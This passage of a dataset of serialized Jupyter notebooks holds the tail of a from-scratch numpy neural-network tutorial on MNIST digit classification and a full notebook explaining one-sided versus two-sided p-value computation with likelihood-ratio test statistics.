element 1 \n# (exclude element number 0, that corresponds to the label) and reshape them as an array with dimension 28 by 28.\nmpp.imshow(image, cmap='Blues', interpolation='None') # show the plot of this array using blue pallete.", "_____no_output_____" ], [ "# Save an observation of the data as an input to work with:\ninput = np.array(np.asfarray(observation[1:]), ndmin=2).T # save necessary elements in a vertical vector shape.", "_____no_output_____" ] ], [ [ "## Fitting the structure of the NN to the Data", "_____no_output_____" ], [ "Let's take a look once again at the NN's structure we have created at the beginning of the tutorial.", "_____no_output_____" ], [ "<img src=\"pics/neural_network1.jpg\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "After inspecting the data, we can conclude that the structure with 3-5-2 nodes is probably not optimal and therefore should be updated in order to fit the data we have and peculiarities of the classification problem: \n\n* For each observation we have 784 elements as an input (label element is excluded). Accordingly, instead of 3 input nodes we should better have 784. \n* Similarly, as we have 10 different options for the outcome (handwritten numbers are labeled from 0 to 9) the number of output nodes should be 10 instead of 2. \n* We also change the number of hidden nodes from 5 to 90. Such a number has been assigned based on some proportionality assumptions which will be checked later: 90 is 9 times higher than 10 and approximately 9 times smaller than 784.", "_____no_output_____" ] ], [ [ "# Determine the new structure of the NN:\ni_n = 784\nh_n = 90\no_n = 10", "_____no_output_____" ] ], [ [ "As we have new structure of the NN we should reassign the weights - now the size of each weight matrix will increase as we have more nodes in each layer.", "_____no_output_____" ] ], [ [ "# Determine the weights:\nw_i_h = np.random.rand(h_n, i_n)\nw_h_o = np.random.rand(o_n, h_n)", "_____no_output_____" ] ], [ [ "So far we have not used the first element of our observation - the label. It will be necessary to compare the predictions of the NN to the real state of the world and to train the NN to make correct predictions. The target should therefore have the same shape as the output layer of the NN, so that they could be comparable. We can represent the label as a vector of n binary (0 or 1) elements (n corresponds to the number of nodes in the output layer). There should be only one element equal to 1 and the position of this element should correspond to the index number of the label we want to predict.", "_____no_output_____" ] ], [ [ "# Create target array:\ntarget = np.array(np.zeros(o_n), ndmin=2).T\ntarget[int(observation[0])] = 1 # int() method returns an integer object from any number or string.", "_____no_output_____" ], [ "# Inspect how the target looks like (remember that the label of observations is 5):\ntarget", "_____no_output_____" ], [ "# Show the sizes of matrices of weights, input and target vectors:\nw_i_h.shape, input.shape, w_h_o.shape, target.shape", "_____no_output_____" ] ], [ [ "## Feedforwarding", "_____no_output_____" ], [ "Once we have the structure of the NN updated for the specific task of classifying the numbers depicted on the images, we can run our network in order to get the first predictions that will be represented by a vector of 10 elements. This vector in its turn can be compared to the target.\n\nTo run the NN, i.e. to feed forward our input data in order to get some predictions, we should follow certain steps:\n\n1. Multiply an input vector by a matrix of weights that connects it with the next layer;\n2. Transform the result using activation function;\n3. Use the output obtained in the 2nd step as an input vector for the next layer.\n\nA sequence of this steps should be repeated n-1 times (where n corresponds to the number of layers). The output of the previous layer will always be the input vector for the next layer. In our case the procedure will happen twice.\n\nIn the picture bellow, you can see the procedure necessary to obtain the output of the hidden layer. The result of matrix multiplication here is called \"Hidden_Input\". Result of the transformation of \"Hidden_Input\" through activation function is called \"Hidden_Output\".\n\nThis output will be used as the input vector that should be multiplied by the next weight matrix and transformed through activation function in order to calculate the final output of the NN. If our NN would have more than one hidden layer, the procedure would be repeated more times.", "_____no_output_____" ], [ "<img src=\"pics/multiplication.png\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "<img src=\"pics/activation.jpg\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "Below you can see the code implementation of all the steps for all layers of the NN.", "_____no_output_____" ] ], [ [ "# Calculate the output of hidden and output layers of our NN:\nh_input = np.dot(w_i_h, input) # dot() performs matrix multiplication; \"h_input\" stands for \"Hidden_Input\".\nh_output = sigmoid(h_input) # \"Hidden_Output\" - result after activation function.\no_input = np.dot(w_h_o, h_output) # \"Output_Input\" - input used for the next layer.\no_output = sigmoid(o_input) # \"Output_Output\" - final output of the NN.", "_____no_output_____" ], [ "# Show intermediate data and output:\n# Uncomment the line of interest in order to see the the corresponding object.\n# h_input\n# h_output\n# o_input\no_output", "_____no_output_____" ] ], [ [ "## Data treatment good practices", "_____no_output_____" ], [ "Once we check the output of the NN and the results of each performed step, we can observe that already at the stage of the h_output all the data converts to a vector in which all the values are equal to 1. Such a vector does not provide us with any helpful insight. Apparently, something is wrong with what we have done so far. There could be several reasons for the problem we face.", "_____no_output_____" ], [ "**First of all, let's take a look at our sigmoid function once again:**", "_____no_output_____" ] ], [ [ "x = np.linspace(-10, 10, 100)\nplt.plot(x, sigmoid(x))\nplt.show()", "_____no_output_____" ] ], [ [ "As we can see the output of the sigmoid function will be almost identical once we feed a number bigger than 2. Similarly there is no significant difference between the outputs if numbers used are smaller than -2. Hence the application of sigmoid function to the original data leads to a loss of valuable information. The NN has problems learning something from the inputs, which are almost undifferentiable. \n\nOne solution is to transform the input we have. Ideally we should have our data in a range between 0 and 1. It is also desirable to avoid zeros as inputs, because the output of a zero input will always be zero, no matter how large the weights are, in which case the NN will not be able to use this input to learn.\n\nWe can perform a transformation of the original data as the one coded below:", "_____no_output_____" ] ], [ [ "# Good practice transformation of the input values:\ninput = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T \n# Our values in our input vector are in the range from 0 to 255. Therefore we should divide input vector by 255, \n# multiply it by 0,99 and add 0,01 in order to get values in the range from 0,01 to 1.\n\n# Good practice transformation of the target value:\ntarget = np.array(np.zeros(o_n) + 0.01, ndmin=2).T\ntarget[int(observation[0])] = 0.99", "_____no_output_____" ] ], [ [ "**Secondly, we can check our way to randomly assign initial weights:**", "_____no_output_____" ], [ "Let's take a look once at the function we used to randomly assign weights:", "_____no_output_____" ] ], [ [ "np.random.rand(3, 5)", "_____no_output_____" ] ], [ [ "As we can see, all the weights are positive, while the actual relationship between the features in the data and the values of the output vector can be negative. Hence, the way we employ to assign random weights should allow for negative weights too.\n\nBelow there are too alternatives how this can be implemented in Python.\n", "_____no_output_____" ] ], [ [ "# Good practice for initial weights assignment:\n \nalternative1 = np.random.rand(3, 5) - 0.5 \n# or\nalternative2 = np.random.normal(0.0, pow(3, -0.5), (3, 5)) \n# arguments: Mean of the distribution, Standard deviation of the distribution, Output shape.\n# Second approach is better as it takes in account the standard deviation \n# that is related to the number of incoming links into a node, 1/√(number of incoming links).\n\n# alternative1\nalternative2", "_____no_output_____" ], [ "# Define the weights in accordance with the best practice:\nw_i_h = np.random.normal(0.0, pow(h_n, -0.5), (h_n, i_n))\nw_h_o = np.random.normal(0.0, pow(o_n, -0.5), (o_n, h_n))", "_____no_output_____" ] ], [ [ "Now that we have all the elements assigned in accordance with good practices, we can feedforward the data once again.", "_____no_output_____" ] ], [ [ "# Run NN to get new classification of the particular observation:\nh_input = np.dot(w_i_h, input)\nh_output = sigmoid(h_input)\no_input = np.dot(w_h_o, h_output)\no_output = sigmoid(o_input)\no_output", "_____no_output_____" ] ], [ [ "## First evaluation of the results", "_____no_output_____" ], [ "Once we have obtained the output of the NN, we can compare it to the target.", "_____no_output_____" ] ], [ [ "# Calculate the errors of the classification:\no_errors = target - o_output\no_errors", "_____no_output_____" ] ], [ [ "The result we would like to achieve should look like as a vector of values where almost all values are negligibly small except for the one value that has the position in the vector corresponding to the index of the true label. \n\nIt is not the case now. Nevertheless one should remember that so far all the weights have been assigned randomly and no training has been performed yet. In any case, it is not a vector of ones anymore, which an improvement.\n\nThus, we can proceed to the next stage, which is to find out where the errors come from and how they can be minimized.", "_____no_output_____" ], [ "## Backpropagation", "_____no_output_____" ], [ "Back propagation is a learning algorithm which aims to minimize the errors/cost function of the NN. Through this learning algorithm, the random weights and biases which were initially given to the network will be optimized to give the best output.", "_____no_output_____" ], [ "Output of each node is the sum of the multiplications of the output of previous nodes by certain weights. Therefore we can associate how much error is coming with every weight and how much error has been brought from each particular node from the previous layer.", "_____no_output_____" ], [ "To understand this better it is worth imagining the following example:\n* node 1 in the output layer of the NN should be equal to 0,01 ;\n* instead the NN is providing us with 0,8.\n\nIn this case we should do the following:\n\n1. Calculate the error of the node (-0,79 in our example);\n\n2. Calculate how much error has been brought by every link to this node.\n\nFor instance if weight w<sub>11</sub> is 0,6 and w<sub>21</sub> is 0,4 then they are associated with an error of -0,79 multiplied by 0,6 and -0,79 multiplied by 0,4 respectively (see Pictures below).", "_____no_output_____" ], [ "<img src=\"pics/bp.jpg\" alt=\"Drawing\" style=\"width: 800px;\"/>", "_____no_output_____" ], [ "After calculation of how much error is associated with every weight we can obtain the errors for the nodes in the proceeding layer.\n\nFor instance error term for node 1 in the hidden layer will be equal to:\n\nthe sum of errors associated with all the weights (w<sub>11</sub> and w<sub>12</sub> in our case) that link this node with the next layer. (see Picture above).", "_____no_output_____" ], [ "Once we repeat this procedure for all the nodes in all layers we can find out how much every node should be changed.\n\nTo do so in Python we just need to make multiplication of vector that contain errors by corresponding matrix of weights.", "_____no_output_____" ] ], [ [ "# Find the errors associated with hidden layer output:\nh_errors = np.dot(w_h_o.T, o_errors)\nh_errors[0:10] # errors in the hidden layer - show the first 10 nodes out of 90.", "_____no_output_____" ] ], [ [ "## Gradient descent", "_____no_output_____" ], [ "Gradient descent is one the most popular algorithms to optimize the neural networks. The name gradient descent is rooted in the procedure where the gradient is repeatedly evaluated to update the parameters. The objective of the gradient descent is to find weight parameters that will minimize the cost function.", "_____no_output_____" ], [ "To understand the concept of gradient descent we should ask ourselves the following question: What can be done to improve the weights we have assigned randomly at the beginning, so that the overall result improves? \n\nTo change the output of any node we should change the weights that connect it with the previous layer. Basically we want to find out how much error in every node changes once we change associated weights. Next we want to select the weights that would lead to a minimal error in the output layer. That can be achieved by differentiation of the cost function and search for its minimum.\n\nGiven multidimensionality of the function, which we need to differentiate, the search for its minimum can be a complicated task. This task is similar to some extent to the search of the path in the darkness from the top of a mountain to its valley. Because it is dark it is almost impossible to reach the valley immediately. The only way to achieve the goal is by exploring the neighbourhood (the radius you are able to see) and tacking small steps in the direction that leads downhill and constantly updating the path for the next steps. This process is illustrated below:", "_____no_output_____" ] ], [ [ "%%html\n<iframe src=\"https://giphy.com/embed/8tvzvXhB3wcmI\" width=\"1000\" height=\"400\" frameBorder=\"0\" class=\"giphy-embed\" allowFullScreen></iframe>\n<p><a href=\"https://giphy.com/gifs/deep-learning-8tvzvXhB3wcmI\">[Source: Giphy.com]</a></p>", "_____no_output_____" ] ], [ [ "Mathematically the differentiation process can be illustrated on the example of weights between output and hidden layers (w<sub>ho</sub>). The same process but with corresponding values should be applied for the weights between input and hidden layers (w<sub>ih</sub>).\n\nAs it can be seen from the formulas below the error we want to minimize (E) can be defined as the sum of squared differences between the target (t<sub>n</sub>) and output (o<sub>n</sub>) values of the NN. The sum of differences for all the nodes in the layer is relevant but when doing calculation for a particular node this sum can be omitted - only the difference between particular output (o<sub>o</sub>) and target (t<sub>o</sub>) matters.\n\nTarget value is constant. Output value depends on weights and is obtained after applying sigmoid function to the sum of inputs (outputs of the previous layer - o<sub>h</sub>) multiplied by corresponding weights (w<sub>ho</sub>).", "_____no_output_____" ], [ "<img src=\"pics/formula2.png\" alt=\"Drawing\" style=\"width: 1000px;\"/>", "_____no_output_____" ], [ "The formula for derivative of the sigmoid function is provided below. It is necessary to keep in mind that the sum to which we apply sigmoid function also depends on the change of weights (w<sub>ho</sub>). Therefore one should follow the chain rule for derivation.", "_____no_output_____" ], [ "<img src=\"pics/formula3.png\" alt=\"Drawing\" style=\"width: 1000px;\"/>", "_____no_output_____" ], [ "The formula we derive is for one particular node. We can however apply it to all the nodes in the layer. In order to do so the only thing we need is to consider this formula in matrix notation. Thus, necessary update of weights linked to all the nodes in a layer will be calculated.\n\nAfter solving the minimization problem we can update the weights we have assigned before.", "_____no_output_____" ], [ "<img src=\"pics/formula5.png\" alt=\"Drawing\" style=\"width: 1000px;\"/>", "_____no_output_____" ], [ "In code this can be represented as follows:", "_____no_output_____" ] ], [ [ "# Update the matrix for weights between hidden and output layers:\nw_h_o += np.dot((o_errors * o_output * (1.0 - o_output)), np.transpose(h_output))\n# Update the matrix for weights between input and hidden layers:\nw_i_h += np.dot((h_errors * h_output * (1.0 - h_output)), np.transpose(input))", "_____no_output_____" ] ], [ [ "## Learning Rate", "_____no_output_____" ], [ "Now, there is something else, we should add in the weights updating procedure. If we completely change our weights with every new observation - our model learns to predict only the last input. Instead of updating weights 100 % every time we can change them only partially - this way every new observation will bring some new knowledge while the previous one will still be in memory even though updated to certain extent. The bigger the learning rate the more importance has the last observation, the smaller it is the more important is all the previous knowledge. The smaller the steps - the more accurate will be the prediction. At the same time it might take more time to learn.", "_____no_output_____" ], [ "<img src=\"pics/learning_rate.png\" alt=\"Drawing\" style=\"width: 600px;\"/> [Source: \"Business Analytics & Data Science Course by Professor S. Lessmann, Chapter 5:\nArtificial Neural Networks\"]", "_____no_output_____" ], [ "Below is the code for weight's update procedure with learning rate included.", "_____no_output_____" ] ], [ [ "# Define the learning rate:\nl_r = 0.3\n\n# Update the weights for the links between the hidden and output layers:\nw_h_o += l_r * np.dot((o_errors * o_output * (1.0 - o_output)), np.transpose(h_output))\n# Update the weights for the links between the input and hidden layers:\nw_i_h += l_r * np.dot((h_errors * h_output * (1.0 - h_output)), np.transpose(input))", "_____no_output_____" ] ], [ [ "## Training", "_____no_output_____" ], [ "So far we have been working with one particular observation. Let's put all the steps done before in a for-loop, so that we can perform them for all observations in our training set. More observations will allow the NN to learn from more information. Every time a new observation is feedforwarded, the error term backpropagated and the cost function minimized, the matrices of weights become more capable to label yet unknown observations.", "_____no_output_____" ] ], [ [ "for i in data:\n observation = i.split(',')\n input = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\n target = np.array(np.zeros(o_n) + 0.01, ndmin=2).T\n target[int(observation[0])] = 0.99\n\n h_input = np.dot(w_i_h, input)\n h_output = sigmoid(h_input)\n o_input = np.dot(w_h_o, h_output)\n o_output = sigmoid(o_input)\n\n o_errors = target - o_output\n h_errors = np.dot(w_h_o.T, o_errors)\n \n w_h_o += l_r * np.dot((o_errors * o_output * (1.0 - o_output)), np.transpose(h_output))\n w_i_h += l_r * np.dot((h_errors * h_output * (1.0 - h_output)), np.transpose(input))\n\n pass", "_____no_output_____" ] ], [ [ "## Second evaluation of the results", "_____no_output_____" ], [ "Once we have trained the model with 100 observations we can test it with new data it has never seen. After loading the test set we can first work with a particular observation to get an intuition about how good our NN can solve considered classification problem. ", "_____no_output_____" ] ], [ [ "# Load the mnist test data CSV file:\nraw_data_test = open(\"data/mnist_test.csv\", 'r')\ndata_test = raw_data_test.readlines()\nraw_data_test.close()", "_____no_output_____" ], [ "# Check a particular observation:\nobservation = data_test[0].split(',')\n# Print the label:\nprint(observation[0])\n# Image the number:\nimage = np.asfarray(observation[1:]).reshape((28,28))\nmpp.imshow(image, cmap='Blues', interpolation='None')", "7\n" ], [ "# Use this observation as an input and run NN with it:\ninput = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\nh_input = np.dot(w_i_h, input)\nh_output = sigmoid(h_input)\no_input = np.dot(w_h_o, h_output)\no_output = sigmoid(o_input)\n\no_output", "_____no_output_____" ], [ "# Get the prediction of NN for this test observation:\nlabel = np.argmax(o_output)\nlabel", "_____no_output_____" ] ], [ [ "After working with a particular observation from the testset we can label all of them and evaluate the accuracy of our NN.", "_____no_output_____" ] ], [ [ "# Test the neural network using all test dataset:\n\nscore = [] # create a list in which the predictions of the network will we saved.\n\n# Go through all the observations in the test data set:\nfor i in data_test:\n observation = i.split(',')\n expected = int(observation[0])\n input = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\n\n h_input = np.dot(w_i_h, input)\n h_output = sigmoid(h_input)\n o_input = np.dot(w_h_o, h_output)\n o_output = sigmoid(o_input)\n\n label = np.argmax(o_output)\n\n if (label == expected):\n score.append(1)\n else:\n score.append(0)\n pass\n \n pass", "_____no_output_____" ], [ "# Calculate the performance score, the fraction of correct answers:\nscore_array = np.asarray(score)\nprint (\"performance = \", score_array.sum() / score_array.size)", "performance = 0.4363\n" ] ], [ [ "It is several times better than naive, which would be 0.1 (given that we have 10 levels of the categorical variable we have to classify). Can we do better?", "_____no_output_____" ], [ "## Further Improvements", "_____no_output_____" ], [ "**Training with several epochs**", "_____no_output_____" ], [ "One way to improve the results of the NN is to train it more. For instance we can feedforward the same 100 observations more than once. Despite the fact that these are the same observations, longer training allows NN to accumulate more knowledge. Keep in mind that due to the presence of a learning rate NN receives only part of the information that is available and useful to predict particular observation. Seeing the same observations several times leads to smaller loss of the data.", "_____no_output_____" ], [ "So let's introduce one extra parameter called \"epochs\" and create a loop around the number of epochs. The rest of the code we see below is the same as before.", "_____no_output_____" ] ], [ [ "epochs = 5", "_____no_output_____" ], [ "# The \"big loop\" with epochs:\nfor e in range(epochs):\n for i in data:\n observation = i.split(',')\n input = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\n target = np.array(np.zeros(o_n) + 0.01, ndmin=2).T\n target[int(observation[0])] = 0.99\n\n h_input = np.dot(w_i_h, input)\n h_output = sigmoid(h_input)\n o_input = np.dot(w_h_o, h_output)\n o_output = sigmoid(o_input)\n\n o_errors = target - o_output\n h_errors = np.dot(w_h_o.T, o_errors)\n w_h_o += l_r * np.dot((o_errors * o_output * (1.0 - o_output)), np.transpose(h_output))\n w_i_h += l_r * np.dot((h_errors * h_output * (1.0 - h_output)), np.transpose(input))\n\n pass\n pass\n\n\n# test\nscore = []\n\nfor i in data_test:\n observation = i.split(',')\n correct_label = int(observation[0])\n input = np.array((np.asfarray(observation[1:])/255.0*0.99) + 0.01, ndmin=2).T\n\n h_input = np.dot(w_i_h, input)\n h_output = sigmoid(h_input)\n o_input = np.dot(w_h_o, h_output)\n o_output = sigmoid(o_input)\n\n label = np.argmax(o_output)\n if (label == correct_label):\n score.append(1)\n else:\n score.append(0)\n pass\n \n pass\n\n\n# calculate accuracy\nscore_array = np.asarray(score)\nprint (\"performance = \", score_array.sum() / score_array.size)", "performance = 0.6904\n" ] ], [ [ "** Training with other l_r**", "_____no_output_____" ], [ "The smaller the learning rate the more capable the network to optimize the weights in a more accurate way. At the same time one should keep in mind that small l_r also means additional loss of information extracted from each particular observation. Hence, there should be many training observations available in order to make the trade-off between accuracy and usage of available data reasonable. Given that we have more epochs now, it is interesting to try a smaller learning rate.", "_____no_output_____" ] ], [ [ "l_r = 0.1\n\n# run the \"big loop\" with epochs again to get measure accuracy for new settings.", "_____no_output_____" ] ], [ [ "**A more complicated structure**", "_____no_output_____" ], [ "As you may remember in the beginning we have assigned the number of nodes in the hidden layer based on some rule of thumb assumptions. Now we can test if the NN will perform better if we increase the number of hidden nodes.", "_____no_output_____" ] ], [ [ "h_n = 150\n\n# Determine the weights for a bigger matrices\nw_i_h = np.random.normal(0.0, pow(h_n, -0.5), (h_n, i_n))\nw_h_o = np.random.normal(0.0, pow(o_n, -0.5), (o_n, h_n))\n\n# run the \"big loop\" with epochs again to get measure accuracy for new settings.", "_____no_output_____" ] ], [ [ "It is always possible to train neural networks where the number of neurons is larger. But, with a smaller number of neurons the neural network has much better generalization abilities. \n\n**Overfitting.** To many nodes is one of the reasons that leads to a problem when the neural network is over trained which would mean that it will fail to recognize patterns which were never used in the training.\n\nWith a smaller number of neurons, it is more complicated to train the network to very small errors, but it may produce much better approximations for new patterns. The most common mistake made by many researchers is that in order to speed up the training process and to reduce the training errors, they use neural networks with a larger number of neurons than required. Such networks could perform poorly for new patterns not seen previously by the NN.", "_____no_output_____" ], [ "**Other training set**", "_____no_output_____" ], [ "One other source of improvement is providing the NN with a relatively big dataset for training. Everything that was done before was implemented with just 100 observations. Let's see if our results improve if we increase our training dataset to 60 000 observations. As we have more data now we will reduce the number of epochs and keep having low learning rate.", "_____no_output_____" ] ], [ [ "# Load the data\nraw_data = open(\"data/mnist_train.csv\", 'r')\ndata = raw_data.readlines()\nraw_data.close()\n\n# Settings\nepochs = 2\nl_r = 0.1\nh_n = 90\nw_i_h = np.random.normal(0.0, pow(h_n, -0.5), (h_n, i_n))\nw_h_o = np.random.normal(0.0, pow(o_n, -0.5), (o_n, h_n))\n\n# run the \"big loop\" with epochs again to get measure accuracy for new settings", "_____no_output_____" ] ], [ [ "The result we achieve with a big training set is already pretty impressive. In more than 90 % of cases our NN is able to solve the classification problem properly. And we should remember that it was implemented from scratch using only basic linear algebra packages. Let's see in the following section \"Replicate with Keras\" if we can do better or if we can simplify the process using specialized packages to build neural networks.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ] ]
e72df90c97d6d3adc857fa5eb83759faa264a94e
48,541
ipynb
Jupyter Notebook
p-value conversion.ipynb
HDembinski/essays
a3070c10c6ca2a9c4b24eb89cba5ec5518e085dd
[ "MIT" ]
17
2020-04-07T07:29:46.000Z
2022-03-04T18:09:31.000Z
p-value conversion.ipynb
HDembinski/essays
a3070c10c6ca2a9c4b24eb89cba5ec5518e085dd
[ "MIT" ]
8
2020-04-08T11:31:52.000Z
2022-01-25T02:01:34.000Z
p-value conversion.ipynb
HDembinski/essays
a3070c10c6ca2a9c4b24eb89cba5ec5518e085dd
[ "MIT" ]
3
2020-05-16T14:35:06.000Z
2022-03-01T05:53:21.000Z
144.898507
30,840
0.872191
[ [ [ "# p-value computation and conversion: one-sided, two-sided?\n\nThis is an attempt to clear up the confusion around p-value computation and based on the authorative source on that matter:\n\n[G. Cowan, K. Cranmer, E. Gross, O. Vitells, Eur.Phys.J.C 71 (2011) 1554](https://inspirehep.net/literature/860907)\n\nThe point of that paper is that one should use two different test statistics based on the likelihood-ratio for deviations that are always positive and for deviations where the sign is not known a priori. One gets two different p-values accordingly. The conversion to significance is then always the same.\n\nI generate a flat distribution from $(-1,1)$ which represents background-only samples, then I fit a Gaussian peak centered at 0 with width 0.1 to this data test the two hypotheses\n\n* $H_0$: there is only background\n* $H_1$: there is background and a signal\n\nThe $H_1$ in these kinds of tests is never arbitrary in terms of the signal, we do not seek for any deviation, but a rather specific one. In our example, we seek for a signal in particular location (here centered at 0). This is important for the computation of the p-value later. The less constrained $H_1$ is, the more of the Look-Elsewhere Effect I get, because more random fluctuations of the background can be confused with a signal.\n\nWhen fitting the toys, I allow the amplitude $\\mu$ of the signal to be positive or negative (following Cowan et al.). As a test statistic for a deviation from the background-only case I use $t_0$ (again following Cowan et al. in the notation)\n$$\nt_0 = -2\\ln \\lambda(0) = -2 \\ln \\frac{L(0, \\hat {\\hat \\theta})}{L(\\hat \\mu, \\hat \\theta)}\n$$\nwhere\n* $\\mu$ is the amplitude of the hypothetical signal\n* $\\theta$ are nuisance parameters\n* $\\hat \\mu$ is the fitted value of $\\mu$\n* $\\hat\\theta$ are the fitted values of $\\theta$ when $\\mu$ is also fitted\n* $\\hat{\\hat\\theta}$ are the fitted values of $\\theta$ under the condition $\\mu = 0$.\n\nIf you search for $t_0$ in the paper, it is not explicitly written there, $t_0$ is $t_\\mu$ from section 2.1 with $\\mu = 0$.", "_____no_output_____" ] ], [ [ "import numpy as np\nfrom iminuit import Minuit\nfrom iminuit.cost import ExtendedUnbinnedNLL\nfrom numba_stats import uniform_pdf, norm_pdf\nimport matplotlib.pyplot as plt\nimport boost_histogram as bh", "_____no_output_____" ], [ "rng = np.random.default_rng(1)\n\ndef model(x, mu, theta):\n return mu + theta, mu * norm_pdf(x, 0, 0.1) + theta * uniform_pdf(x, -1, 2)\n\npositive = [0]\nnegative = [0]\nt0 = []\nmu = []\nfor imc in range(1000):\n b = rng.uniform(-1, 1, size=1000)\n c = ExtendedUnbinnedNLL(b, model)\n m = Minuit(c, mu=0, theta=len(b))\n m.limits[\"theta\"] = (0, None)\n m.fixed[\"mu\"] = True\n m.migrad()\n assert m.valid\n lnL_b = -m.fval\n m.fixed[\"mu\"] = False\n m.migrad()\n mui = m.values[\"mu\"]\n lnL_sb = -m.fval\n t0i = 2 * (lnL_sb - lnL_b)\n t0.append(t0i)\n mu.append(mui)\n if mui > 0 and t0i > positive[0]:\n h = bh.Histogram(bh.axis.Regular(100, -1, 1))\n h.fill(b)\n positive = (t0i, h, m.values[:], m.covariance[:])\n elif mui < 0 and t0i > negative[0]:\n h = bh.Histogram(bh.axis.Regular(100, -1, 1))\n h.fill(b)\n negative = (t0i, h, m.values[:], m.covariance[:])\n \nt0 = np.array(t0)\nmu = np.array(mu)", "_____no_output_____" ] ], [ [ "Let's look at the two most extreme deviations from $H_0$, the ones with the largest and smallest signal.", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots(1, 2, figsize=(14, 5), sharex=True, sharey=True)\nfor (t0i, h, par, cov), axi in zip((negative, positive), ax):\n plt.sca(axi)\n scale = 1/h.axes[0].widths\n plt.errorbar(h.axes[0].centers, h.values() * scale, h.variances()**0.5 * scale, fmt=\"ok\", label=\"data\")\n scale = 1 / h.axes[0].widths\n xm = np.linspace(-1, 1)\n plt.plot(xm, model(xm, *par)[1], label=\"fit\")\n plt.legend()\n dev = par[0] / cov[0,0] ** 0.5\n plt.title(f\"$\\mu = {par[0]:.1f}$ $t_0 = {t0i:.2f}$\")\n plt.ylabel(\"density\")\n plt.xlabel(\"$x$\")", "_____no_output_____" ] ], [ [ "Both upward and downward fluctuations are unlikely events if $H_0$ is true and therefore both get a large value of our test statistic $t_0$, which does not know in which way the deviation went.\n\n#### Searches with $\\mu > 0$ (for a new particle, new decay mode, etc.)\n\nIn most cases we look for a positive peak (new particle, new decay mode, etc). If we see a downward fluctuation, we **know for sure** that this cannot be what we are looking for. Therefore, when we compute the p-value for some observation from a simulation like this one, we must not regard large values of the test statistic when the fluctuation was negative, since this is not a deviation of $H_0$ that mimics our signal. Instead we should set $t_0$ to zero in such cases. Cowan et al. use $q_0$ for this modified test statistic\n$$\nq_0 = \\begin{cases}\nt_0 &\\text{if } \\hat\\mu \\ge 0 \\\\\n0 &\\text{otherwise}\n\\end{cases}\n$$", "_____no_output_____" ] ], [ [ "plt.hist(t0, alpha=0.5, bins=20, range=(0, 20), label=\"$t_0$\")\nq0 = t0.copy()\nq0 = np.where(mu < 0, 0, t0)\nplt.hist(q0, alpha=0.5, bins=20, range=(0, 20), label=\"$q_0$\")\nplt.legend()\nplt.axhline()\nplt.xlabel(\"$t_0, q_0$\")\nplt.semilogy();", "_____no_output_____" ] ], [ [ "If we observed $t_0 = q_0 = 15$ in a real experiment, we need to compare it with the $q_0$ distribution and not with the $t_0$ distribution to compute the p-value.", "_____no_output_____" ] ], [ [ "print(f\"Wrong: p-value based on t0-distribution {np.mean(t0 > 15)}\")\nprint(f\"Right: p-value based on q0-distribution {np.mean(q0 > 15)}\")", "Wrong: p-value based on t0-distribution 0.006\nRight: p-value based on q0-distribution 0.004\n" ] ], [ [ "As we can see, the p-value is enhanced in this case, because we do not need to consider the negative fluctuations at all. The conversion to significance $Z$ is done with a normal distribution.", "_____no_output_____" ] ], [ [ "from scipy.stats import norm\n\np = np.mean(q0 > 15)\nprint(f\"Z = {norm.ppf(1 - p):.2f}\")", "Z = 2.65\n" ] ], [ [ "#### Searches for deviations where the sign of $\\mu$ is not known a priori\n\nIf cannot exclude a priori that our signal has $\\mu < 0$, we need to use the $t_0$ distribution instead of $q_0$.\n\nIf we observed $t_0 = 15$ in a real experiment, we need to compare it with $t_0$ distribution to compute the p-value.", "_____no_output_____" ] ], [ [ "print(f\"Right: p-value based on t0-distribution {np.mean(t0 > 15)}\")", "Right: p-value based on t0-distribution 0.006\n" ] ], [ [ "As we can see, the p-value is diluted in this case, because we need to consider fluctuations in both directions. In other words, the Look-Elsewhere Effect is larger in this case, because more kinds of fluctuations in the background can be confused with a signal.", "_____no_output_____" ] ], [ [ "from scipy.stats import norm\n\np = np.mean(t0 > 15)\nprint(f\"Z = {norm.ppf(1 - p):.2f}\")", "Z = 2.51\n" ] ], [ [ "Accordingly, the significance is a bit lower compared to the previous case.", "_____no_output_____" ] ] ]
